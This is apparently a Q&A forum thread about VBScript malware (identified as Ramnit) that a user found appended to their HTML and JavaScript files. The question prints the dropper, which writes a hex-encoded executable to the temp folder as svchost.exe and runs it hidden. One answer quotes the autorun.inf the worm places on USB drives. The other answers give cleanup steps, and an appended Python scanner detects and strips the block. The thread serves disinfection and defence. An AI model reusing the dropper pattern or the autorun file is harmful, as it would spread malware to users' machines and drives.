Whenever I open a JavaScript (.js) or HTML (.html) file after a few days in Notepad++, a similar VBScript gets automatically added at the end. I strongly feel that this is some kind of virus. Can anyone guide me on this?
</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- .... {Lots of junk characters here } -->
asked Jul 6, 2015 at 12:58 by tryingToLearn (edited Jul 7, 2015 at 7:27)
Comments:
- That looks like a virus appending code to your requests. Possibly your web host, or your ISP if these files are hosted online. It's overwriting your svchost.exe file, which every service runs under. – Blindy Commented Jul 6, 2015 at 13:02
- Looks a lot like a virus, I get a few results by searching for that number "4D5A90000300000004000". The "number" is the code that will be run. If you print out what is sent to FileObj.Write you might see the code. – the_lotus Commented Jul 6, 2015 at 13:02
- @Blindy Overwriting svchost.exe sounds scary. – tryingToLearn Commented Jul 6, 2015 at 13:07
- It's downright terrifying, you can do anything afterwards. And it's very hard to manually get rid of since simply starting Windows opens and locks svchost.exe. Good news is you probably don't need to, there's plenty of antivirus software out there. – Blindy Commented Jul 6, 2015 at 13:09
- Every time I open this page I get a warning from Avast - it identifies the malware as VBS:Agent-KZ [Trj] - that may help in removing the trojan – Jaromanda X Commented Jul 11, 2015 at 15:53
4 Answers
The file it runs is %temp%\svchost.exe.
Therefore do a tasklist
tasklist /svc /fi "imagename eq svchost.exe"
Make a note of svchosts without any containing services. Put the actual PID in for xxxx
taskkill /pid xxxx /pid xxxx /pid xxxx /f
That will stop that particular part running.
The technique used by the virus won't work reliably, especially on non-English Windows.
Also, instead of deleting it, change security to prevent execution until you clean other parts that may exist.
icacls "%temp%\svchost.exe" /deny Everyone:F
This is for Vista but broadly applicable to all versions.
Virus Cleaning
If you have problems doing these in normal mode, try doing it in Safe Mode with Networking.
Click Start - All Programs - Accessories - Run and type
msconfig
Then go to the Boot tab and click Safe Boot and also tick Network. Reboot. Come back here and untick Safe Boot to return to normal mode.
Safety Scanner
The Microsoft Safety Scanner is a free downloadable security tool that provides on-demand scanning and helps remove viruses, spyware, and other malicious software. It works with your existing antivirus software.
http://www.microsoft.com/security/scanner/en-au/default.aspx
Malicious Software Removal Tool
If you can't download or run the Safety Scanner, Windows has a tiny antivirus program built in. It only targets the most common threats. It will want to update, don't let it. Run it without updating. Then run it again, updating it this time.
Click Start - All Programs - Accessories - Run (or press Winkey + R). Type
mrt
Reset Firewall
You can reset your firewall to default settings.
Start - All Programs - Accessories - Right click Command Prompt and choose Run As Administrator. Type (or copy and paste by right clicking in the Command Prompt window and choosing Paste).
netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"
Security Fixits
Fixits are troubleshooting programs from Microsoft. There are 27 of them.
Automatically fix Windows security settings to keep your PC safe
http://support.microsoft.com/mats/Malware_Prevention/en-us
and
Fix security issues to protect and secure Windows automatically
http://support.microsoft.com/mats/windows_security_diagnostic/en-us
and
Fix Internet Explorer issues to make IE fast, safe and stable
http://support.microsoft.com/mats/ie_performance_and_safety/en-us
For the full list visit
http://support.microsoft.com/fixit/en-us
When you choose to download it, choose the option to run on another computer. Then you can save it to your hard disk in a folder. Open the folder, open the folder Fix it Portable, and run Launch Fix It. It will contain all 27 Fixits.
Full Time Antivirus
For a permanent antivirus, we here in the forums notice a complete lack of problems for people using Microsoft Security Essentials.
http://www.microsoft.com/en-au/download/details.aspx?id=5201
If All Else Fails
This program from Microsoft boots another basic operating system to clean Windows. You need to put it on a USB or DVD and then boot from it.
http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline
Look Up Detail On The Threat
Microsoft maintains an encyclopedia of virus information.
http://www.microsoft.com/security/portal/threat/threats.aspx
I also think that your system has been affected by some viruses. I want to share a link which I came across that matches your question, please go through it. Here is the link: http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page
I think it is a virus.
So, you need to install antivirus software if you do not have one.
I recommend free: Microsoft Security Essentials or Avast.
Also, you could download a special antivirus utility just for scanning, without installing it – Dr. Web CureIt!
Then make a full scan of your computer.
You should check all startup commands and remove all malicious ones, e.g. CCleaner Free could help you to check them.
UPD
After cleaning and removing startup commands you could use the sfc utility.
Microsoft Windows Resource Checker
Scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions.
Run cmd with admin privileges and then run the sfc /scannow command.
This is a virus called Win32.Ramnit, read the description here:
https://www.virustotal.com/#/file/fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320/detection
I have just discovered this virus on one of my client's computers and this virus modified all my HTML files on my USB portable hard disk.
This script executes the VBScript to create a file and execute it, and installs a program in this folder:
C:\Program Files\Microsoft\DesktopLayer.exe
read more: http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm
and for every USB pendrive that you insert into this infected PC, the virus will create 2 files:
autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe
The content of autorun.inf:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
Which attempts to execute the virus installer when this pendrive is inserted into another computer.
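
An added example, not from any of the posts above: Python that finds the appended VBScript block shown in the question in .html/.htm/.js files, removes it from a text buffer, and lists the programs an autorun.inf like the one in the last answer would start. The function names and the SAMPLE string are constructed for illustration.

```python
import re
from pathlib import Path

# Appended block of the shape shown in the question: VBScript that holds a hex
# string in WriteData, writes it to disk and starts it via WScript.Shell.
DROPPER = re.compile(
    r'<script\s+language\s*=\s*"?vbscript"?\s*>(.*?)</script>(\s*<!--.*?-->)?',
    re.IGNORECASE | re.DOTALL)
HEXDATA = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]{4,})', re.IGNORECASE)
# autorun.inf keys that name a program to start
AUTORUN_KEY = re.compile(
    r'^\s*(open|shellexecute|shell\\[^=\\]+\\command)\s*=\s*(.+?)\s*$',
    re.IGNORECASE | re.MULTILINE)
# Constructed sample: a clean page followed by a block shaped like the question's
SAMPLE = ('<html><body>ok</body></html>\n<SCRIPT Language=VBScript><!--\n'
          'WriteData = "4D5A9000"\nSet WSHshell = CreateObject("WScript.Shell")\n'
          '//--></SCRIPT><!-- junk -->')

def find_dropper(text):
    """Return details of the first matching dropper block, or None."""
    for m in DROPPER.finditer(text):
        body = m.group(1)
        data = HEXDATA.search(body)
        if data and re.search(r'WScript\.Shell', body, re.IGNORECASE):
            # 4D5A is "MZ", the magic at the start of a Windows executable
            is_pe = data.group(1).upper().startswith("4D5A")
            return {"start": m.start(), "end": m.end(), "payload_is_pe": is_pe}
    return None

def strip_dropper(text):
    """Remove the dropper block and the comment that trails it."""
    hit = find_dropper(text)
    return text if hit is None else text[:hit["start"]] + text[hit["end"]:]

def autorun_targets(inf_text):
    """List the distinct programs an autorun.inf would launch."""
    return sorted({m.group(2) for m in AUTORUN_KEY.finditer(inf_text)})

def scan_tree(root):
    """Yield (path, finding) for .html/.htm/.js files carrying the block."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".html", ".htm", ".js"}:
            hit = find_dropper(path.read_text(errors="replace"))
            if hit:
                yield path, hit
```

Run scan_tree over a project folder or a mounted removable drive from a machine that is known to be clean, since files can be re-modified while the infection is still active.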